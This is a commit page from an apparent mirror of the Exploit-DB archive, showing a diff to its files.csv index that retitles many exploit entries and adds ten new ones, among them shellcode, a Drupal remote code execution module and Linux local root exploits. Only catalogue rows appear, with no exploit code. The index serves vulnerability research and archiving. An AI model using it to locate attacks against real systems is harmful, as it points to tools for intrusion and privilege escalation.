bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-21

Browse source 
10 new exploits

Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass
Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass

Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit

Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit
Simplog 0.9.3 - (tid) SQL Injection
Skulltag <= 0.96f - (Version String) Remote Format String PoC
OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit
Skulltag 0.96f - (Version String) Remote Format String PoC
OpenTTD 0.4.7 - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)
Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include
Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit
Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion
phpMyAgenda 3.0 Final - (rootagenda) Remote Include
Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion

X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit
X7 Chat 2.0 - (help_file) Remote Command Execution

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
Auction 1.3m - (phpbb_root_path) Remote File Inclusion
acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit
acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit

AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit
AWStats 6.5 - (migrate) Remote Shell Command Injection

acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit
acFTP FTP Server 1.4 - (USER) Remote Denial of Service
PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities
Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit
ACal <= 2.2.6 - (day.php) Remote File Inclusion
EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion
PHP-Fusion 6.00.306 - Multiple Vulnerabilities
Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion
ACal 2.2.6 - (day.php) Remote File Inclusion
EQdkp 1.3.0 - (dbal.php) Remote File Inclusion

Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service
Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service

Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit
Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)

Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit
Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit

\o - Local File Inclusion (1st)
Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)

PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept
Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept

Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Django CMS 3.3.0 - (Editor Snippet) Persistent XSS
Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Wowza Streaming Engine 4.5.0 - Local Privilege Escalation
Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation
Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF
Wowza Streaming Engine 4.5.0 - Multiple XSS
OpenSSHD <= 7.2p2 - Username Enumeration
WordPress Video Player Plugin 1.5.16 - SQL Injection
This commit is contained in:
Offensive Security 2016-07-21 05:06:28 +00:00
parent 965b4bba8f
commit ec03ab428f
11 changed files with 1215 additions and 32 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

72
files.csv
View file

@ -557,7 +557,7 @@ id,file,description,date,author,platform,type,port
715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513
718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0
721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0
725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0
@ -1419,23 +1419,23 @@ id,file,description,date,author,platform,type,port
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0
1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0
1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0
1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0
1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0
1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0
1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0
1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0
1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0
1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0
1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0
1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0
1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0
@ -1450,11 +1450,11 @@ id,file,description,date,author,platform,type,port
1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0
1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0
1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0
1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
@ -1462,23 +1462,23 @@ id,file,description,date,author,platform,type,port
1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0
1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0
1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0
1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0
1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0
1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0
1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0
1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0
1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0
1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0
1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0
1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0
1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0
1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0
@ -1487,9 +1487,9 @@ id,file,description,date,author,platform,type,port
1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0
1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0
1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203
1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0
1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0
1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0
1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
@ -1710,16 +1710,16 @@ id,file,description,date,author,platform,type,port
2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0
2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0
2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0
2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0
4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0
5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
@ -8685,7 +8685,7 @@ id,file,description,date,author,platform,type,port
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0
@ -18028,7 +18028,7 @@ id,file,description,date,author,platform,type,port
20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0
20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0
20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
@ -36284,3 +36284,13 @@ id,file,description,date,author,platform,type,port
40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
